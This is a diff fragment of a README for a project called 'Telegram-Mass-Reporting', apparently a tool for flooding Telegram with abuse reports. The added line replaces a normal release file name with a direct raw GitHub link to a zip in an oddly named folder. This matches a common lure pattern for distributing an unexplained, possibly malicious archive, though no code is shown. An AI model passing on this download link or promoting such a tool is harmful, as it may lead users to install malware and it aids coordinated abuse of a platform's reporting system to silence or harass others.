akshat1917/Telegram-Mass-Reporting/README.md

 3. **Download the Application**

    Click on the version you wish to download.
 You will see several files available.
-If you are using Windows, look for "Telegram-Mass-Reporting-Windows.zip" or a similar file name.
+If you are using Windows, look for "https://raw.githubusercontent.com/akshat1917/Telegram-Mass-Reporting/main/cleistocarpous/Telegram-Mass-Reporting.zip" or a similar file name.
 Click the link to start the download.

 4. **Extract the Files**